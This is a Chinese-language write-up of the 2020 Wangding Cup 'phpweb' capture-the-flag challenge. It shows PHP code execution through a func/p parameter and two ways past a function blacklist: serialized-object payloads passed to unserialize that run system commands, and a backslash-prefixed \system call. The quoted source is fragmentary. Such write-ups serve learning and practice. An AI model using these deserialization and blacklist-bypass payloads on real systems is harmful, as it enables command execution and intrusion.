[网鼎杯 2020 朱雀组]phpweb

先发现他的页面一直刷新，时间也一直刷新，有点眼熟

先抓包看看，发现post参数，可能是前面传的是函数，后面是函数的参数

试试其他函数比如MD5()确实执行了

但是在尝试system的时候发现hacking，说明被过滤了，试了passthru()同样也是

这里我们需要查看页面源代码，进行代码审计 在这里我们可以使用多种函数进行查看 例如：file_get_contents、highlight_file() ，show_source()等

file_get_contents(index.php):读取文件的内容

其他师傅通过func=file_get_contents&p=index.php得到源码 可我却没有，我也不清楚了

 func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
​
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

代码审计，本关的黑名单还是挺全面的。

方法一：

但咱们可以使用 反序列化 （出题人的本意也应该是这样）

构造payload：

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

并没有发现有用的

查看根目录也是没有

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

发现还是没有 falg的信息

system(“find / -name flag”)：查找所有文件名匹配flag的文件

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

 
  
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}
 
  
 
  
 
  
方法二：
 
  
我们要对黑名单进行一个绕过 所以在本关我们可以使用别的方法来达到获取flag的目的 php内的" \ "在做代码执行的时候，会识别特殊字符串，绕过黑名单
 
  
func=\system&p=find / -name flag*
 
  
 
  
 
  
func=\system&p=cat /tmp/flagoefiu4r93